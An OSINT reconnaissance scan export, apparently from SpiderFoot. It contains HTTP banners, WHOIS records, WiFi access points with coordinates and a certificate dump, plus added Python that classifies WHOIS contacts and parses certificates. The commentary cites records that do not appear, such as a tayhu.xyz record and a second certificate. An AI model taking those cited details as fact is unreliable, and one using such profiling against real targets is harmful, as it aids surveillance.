| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c53def4fc411045-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:09:40 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 115.48.229.35.bc.googleusercontent.com | 35.229.48.115 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Wireless (Net ID: 00:09:5B:31:8E:D4) | 39.0469, -77.4903 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=lshBmhR4GSBYjKDefqIGkygGexG96Rixvbfv4WfP5q9iY7bD%2BJ8d%2FnJqoPqz7%2FLjDZIRQ0jW5G%2BSrG0ejdUc3LLQdFd%2BIoXwZdUdzxFXOZIrwBisdLoxnDYZ09vi9PExVEvG%2FnDtTw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:15 GMT", "cf-ray": "7c5f6041aa868cdc-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +14806242599 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-4F32 (Net ID: 00:1D:D4:64:4F:30) | 32.8608, -79.9746 |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 2 | 0 | None | www.battleb0t.xyz. 300 IN CNAME battleb0t.github.io. | www.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | imgur (Category: images)
https://imgur.com/user/login/about | login |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@ascio.com | Domain Name: DONTKILLMYAPP.COM
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:34:59Z
Creation Date: 2018-12-19T04:28:10Z
Registry Expiry Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc. Danmark - Filial af Ascio technologies, Inc. USA
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +1.4165350123
Domain Status: ok https://icann.org/epp#ok
Name Server: NS.WEDOS.COM
Name Server: NS.WEDOS.CZ
Name Server: NS.WEDOS.EU
Name Server: NS.WEDOS.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: dontkillmyapp.com
Registry Domain ID: 2344645406_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.ascio.com
Registrar URL: http://www.ascio.com
Updated Date: 2022-11-24T07:35:59Z
Creation Date: 2018-12-19T00:00:00Z
Registrar Registration Expiration Date: 2023-12-19T04:28:10Z
Registrar: Ascio Technologies, Inc
Registrar IANA ID: 106
Registrar Abuse Contact Email: abuse@ascio.com
Registrar Abuse Contact Phone: +44 (20) 81583881
Domain Status: OK https://icann.org/epp#ok
Registry Registrant ID: Not Disclosed
Registrant Name: Not Disclosed
Registrant Organization: Not Disclosed
Registrant Street: Not Disclosed
Registrant City: Not Disclosed
Registrant State/Province:
Registrant Postal Code: Not Disclosed
Registrant Country: CZ
Registrant Phone: Not Disclosed
Registrant Phone Ext: Not Disclosed
Registrant Fax: Not Disclosed
Registrant Fax Ext: Not Disclosed
Registrant Email: https://whoiscontact.ascio.com?domainname=dontkillmyapp.com
Registry Admin ID: Not Disclosed
Admin Name: Not Disclosed
Admin Organization: Not Disclosed
Admin Street: Not Disclosed
Admin City: Not Disclosed
Admin State/Province: Not Disclosed
Admin Postal Code: Not Disclosed
Admin Country: Not Disclosed
Admin Phone: Not Disclosed
Admin Phone Ext: Not Disclosed
Admin Fax: Not Disclosed
Admin Fax Ext: Not Disclosed
Admin Email: Not Disclosed
Registry Tech ID: Not Disclosed
Tech Name: Not Disclosed
Tech Organization: Not Disclosed
Tech Street: Not Disclosed
Tech City: Not Disclosed
Tech State/Province: Not Disclosed
Tech Postal Code: Not Disclosed
Tech Country: Not Disclosed
Tech Phone: Not Disclosed
Tech Phone Ext: Not Disclosed
Tech Fax: Not Disclosed
Tech Fax Ext: Not Disclosed
Tech Email: Not Disclosed
Name Server: ns.wedos.net
Name Server: ns.wedos.cz
Name Server: ns.wedos.eu
Name Server: ns.wedos.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: https://icann.org/wicf
>>> Last update of WHOIS database: 2023-05-12T03:09:25Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in Ascio Technologies' WHOIS database is provided
by Ascio Technologies for information purposes only. By submitting
a WHOIS query, you agree that you will use this data only for lawful
purpose. In addition, you agree not to:
(a) use the data to allow, enable, or otherwise support any marketing
activities, regardless of the medium used. Such media include but are
not limited to e-mail, telephone, facsimile, postal mail, SMS, and
wireless alerts; or
(b) use the data to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.
(c) sell or redistribute the data except insofar as it has been
incorporated into a value-added product or service that does not permit
the extraction of a substantial portion of the bulk data from the value-added
product or service for use by other parties.
Ascio Technologies reserves the right to modify these terms at any time.
Ascio Technologies cannot guarantee the accuracy of the data provided.
By accessing and using Ascio Technologies WHOIS service, you agree to these terms.
|
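The three WHOIS records in this section show the three ways a registrant is hidden: Cloudflare's tayhu.xyz record replaces fields with DATA REDACTED but still leaves State/Province Hamburg and Country DE; GoDaddy's ayhu.xyz record lists Domains By Proxy, LLC in Tempe, so the +14806242599 reported by the Phone Number Extractor row is the proxy service's number, not the registrant's; Ascio's dontkillmyapp.com record says Not Disclosed. The registry (CentralNic) and registrar (GoDaddy) views of ayhu.xyz also disagree on Updated Date. The following Python is an added example, not SpiderFoot's code or anything from the page: it parses WHOIS key/value output, classifies each contact before any phone number is treated as attributable, reports what a redacted record still discloses, and diffs two views of one domain. REGISTRY_VIEW, REGISTRAR_VIEW and REDACTED_VIEW are abbreviated from the records above; DISCLOSED_VIEW is constructed (reserved example.com, 555 number) to show the positive case; the marker lists are heuristics.

```python
"""Classify WHOIS contacts before treating them as attribution evidence.

Added example for this scan export, not SpiderFoot code. REGISTRY_VIEW,
REGISTRAR_VIEW and REDACTED_VIEW are abbreviated from the records on the page;
DISCLOSED_VIEW is constructed (reserved example.com, 555 number).
"""
import re

# Heuristic markers; extend them for other privacy services you meet.
PROXY_MARKERS = ("domains by proxy", "whoisguard", "withheld for privacy", "proxy")
REDACTION_MARKERS = ("data redacted", "not disclosed", "redacted for privacy",
                     "please query the rdds")
E164 = re.compile(r"\+\d{1,3}\.\d{4,14}")  # WHOIS writes phones as +CC.number
KEY_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9 /'()-]*?):\s*(.*)$")

REGISTRY_VIEW = """Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registrant Organization: Domains By Proxy, LLC
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
"""
REGISTRAR_VIEW = """Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Abuse Contact Phone: +1.4806242505
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant City: Tempe
Registrant Phone: +1.4806242599
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
"""
REDACTED_VIEW = """Domain Name: TAYHU.XYZ
Registrar: Cloudflare, Inc.
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant State/Province: Hamburg
Registrant Country: DE
Registrant Phone: DATA REDACTED
"""
DISCLOSED_VIEW = """Domain Name: example.com
Registrant Name: Example Registrant
Registrant Organization: Example Corp
Registrant Phone: +1.2025550123
"""


def parse_whois(text):
    """Ordered (key, value) pairs; repeated keys such as Name Server are kept."""
    pairs = []
    for line in text.splitlines():
        if line.lstrip().startswith((">>>", "http")):
            continue  # database timestamp banner and bare URLs are not fields
        m = KEY_RE.match(line)
        if m:
            pairs.append((m.group(1).strip(), m.group(2).strip()))
    return pairs


def contact(pairs, role):
    """Fields of one contact role, keyed without the role prefix:
    'Registrant Phone' becomes 'Phone'."""
    return {k[len(role) + 1:]: v for k, v in pairs if k.startswith(role + " ")}


def classify_contact(fields):
    """'proxy' when a privacy service is the listed organization, 'redacted'
    when the registrar blanked the fields, 'disclosed' only otherwise."""
    if any(m in fields.get("Organization", "").lower() for m in PROXY_MARKERS):
        return "proxy"
    joined = " ".join(fields.values()).lower()
    if not fields.get("Name") or any(m in joined for m in REDACTION_MARKERS):
        return "redacted"
    return "disclosed"


def residual_fields(fields):
    """Values left once redaction placeholders are removed; for a proxy
    contact these describe the proxy service, not the domain holder."""
    return {k: v for k, v in fields.items()
            if v and not any(m in v.lower() for m in REDACTION_MARKERS)}


def attributable_phones(pairs):
    """Phone/fax numbers of disclosed contacts only, as +CC digits; proxy,
    redacted and registrar-abuse numbers identify someone else."""
    found = set()
    for role in ("Registrant", "Admin", "Tech", "Billing"):
        fields = contact(pairs, role)
        if classify_contact(fields) != "disclosed":
            continue
        for key in ("Phone", "Fax"):
            m = E164.search(fields.get(key, ""))
            if m:
                found.add(m.group(0).replace(".", ""))
    return sorted(found)


def record_diffs(a, b, keys=("Registry Domain ID", "Updated Date", "Creation Date",
                             "Name Server", "DNSSEC")):
    """Keys on which two views of one domain disagree (registry vs registrar).
    Multi-valued keys compare as sets; case and a '.0' fraction are ignored."""
    def values(pairs, key):
        return {re.sub(r"\.0+(?=z$)", "", v.lower()) for k, v in pairs if k == key}
    return {k: (values(a, k), values(b, k)) for k in keys if values(a, k) != values(b, k)}


if __name__ == "__main__":
    reg, rar = parse_whois(REGISTRY_VIEW), parse_whois(REGISTRAR_VIEW)
    for label, pairs in (("registry", reg), ("registrar", rar),
                         ("redacted", parse_whois(REDACTED_VIEW)),
                         ("disclosed", parse_whois(DISCLOSED_VIEW))):
        holder = contact(pairs, "Registrant")
        print(label, classify_contact(holder), residual_fields(holder), attributable_phones(pairs))
    print("registry/registrar disagree on:", sorted(record_diffs(reg, rar)))
```

Run it directly to see that the GoDaddy record yields no attributable phone at all, that the Cloudflare record still leaks Hamburg/DE, and that the two ayhu.xyz views differ only in Updated Date. Anything the Phone Number Extractor pulls from a proxy or redacted contact should be filed as the proxy's contact detail, not as an attribute of the target.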
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Ashton7346 (Net ID: 00:06:25:61:05:DC) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0101.github.io]
https://www.openphish.com/feed.txt | 0101.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | snoopyine (Net ID: 00:01:E3:4A:B1:79) | 50.1188, 8.6843 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | vapor (Net ID: 00:02:2D:09:FC:69) | 37.780462,-122.390564 |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cpcontacts.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
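The two certificate dumps above (the cpanel.ayhu.xyz row and the cpcontacts.ayhu.xyz row) carry the same serial number. The first has the CT Precertificate Poison extension, the second the two SCTs, so they are the precertificate and the final certificate of a single Let's Encrypt issuance rather than two certificates, and both had expired (Not After Mar 14 2023) by the time of the 2023-05-12 scan. The SAN list is where the "Internet Name - Unresolved" hostnames such as cpanel.ayhu.xyz and webdisk.ayhu.xyz came from. The following Python is an added example, not SpiderFoot's code or anything from the page: it parses an openssl-style text dump and makes those three checks. The sample input is trimmed from the two dumps above (modulus, key identifiers and signature bytes dropped; every kept line is verbatim), and SCAN_TIME is the timestamp of those rows.

```python
"""Pull the fields a reviewer acts on out of an `openssl x509 -text` dump.

Added example for this scan export, not SpiderFoot code. The two samples are
trimmed from the dumps on the page (modulus, key identifiers and signature
bytes dropped); every kept line is verbatim.
"""
import re
from datetime import datetime, timezone

_COMMON = """Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Dec 14 03:53:54 2022 GMT
            Not After : Mar 14 03:53:53 2023 GMT
        Subject: CN=ayhu.xyz
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
"""
# First dump on the page: the CT precertificate, marked by the poison extension.
PRECERT_TEXT = _COMMON + """            CT Precertificate Poison: critical
                NULL
"""
# Second dump: the final certificate, carrying the SCTs the logs returned.
FINAL_TEXT = _COMMON + """            CT Precertificate SCTs:
                Signed Certificate Timestamp:
                    Timestamp : Dec 14 04:53:54.573 2022 GMT
                Signed Certificate Timestamp:
                    Timestamp : Dec 14 04:53:55.080 2022 GMT
"""
# Timestamp of the "Internet Name - Unresolved" rows on the page.
SCAN_TIME = datetime(2023, 5, 12, 3, 3, 17, tzinfo=timezone.utc)


def _field(pattern, text):
    m = re.search(pattern, text, re.M)
    return m.group(1).strip() if m else ""


def _gmt(value):
    # openssl pads single-digit days with a second space ("Dec  4"); collapse it
    clean = " ".join(value.replace("GMT", "").split())
    return datetime.strptime(clean, "%b %d %H:%M:%S %Y").replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Serial, names, validity window and CT status from the text dump."""
    return {
        "serial": _field(r"Serial Number:\s*([0-9A-Fa-f:]+)", text).lower(),
        "issuer": _field(r"^\s*Issuer:\s*(.+)$", text),
        "subject": _field(r"^\s*Subject:\s*(.+)$", text),
        "not_before": _gmt(_field(r"Not Before\s*:\s*(.+)$", text)),
        "not_after": _gmt(_field(r"Not After\s*:\s*(.+)$", text)),
        "san": re.findall(r"DNS:([^,\s]+)", text),
        "precert": "CT Precertificate Poison" in text,
        "sct_count": text.count("Signed Certificate Timestamp:"),
    }


def kind(cert):
    """A precertificate is never served to clients; it exists so CT logs can
    sign it before the final certificate is issued under the same serial."""
    return "precertificate" if cert["precert"] else "certificate"


def same_issuance(a, b):
    """True when the dumps are the precert and final cert of one issuance."""
    return a["serial"] == b["serial"] and a["precert"] != b["precert"]


def valid_at(cert, when):
    return cert["not_before"] <= when <= cert["not_after"]


def hosts_to_resolve(cert):
    """The fan-out a scanner gets from one certificate: every SAN plus the CN.
    This is where rows such as cpanel.ayhu.xyz and webdisk.ayhu.xyz came from."""
    cn = re.search(r"CN=([^,/]+)", cert["subject"])
    return sorted(set(cert["san"]) | ({cn.group(1)} if cn else set()))


if __name__ == "__main__":
    pre, fin = parse_cert_text(PRECERT_TEXT), parse_cert_text(FINAL_TEXT)
    for c in (pre, fin):
        print(kind(c), "SCTs:", c["sct_count"], "valid at scan:", valid_at(c, SCAN_TIME))
    print("same issuance:", same_issuance(pre, fin))
    print("hosts:", hosts_to_resolve(fin))
```

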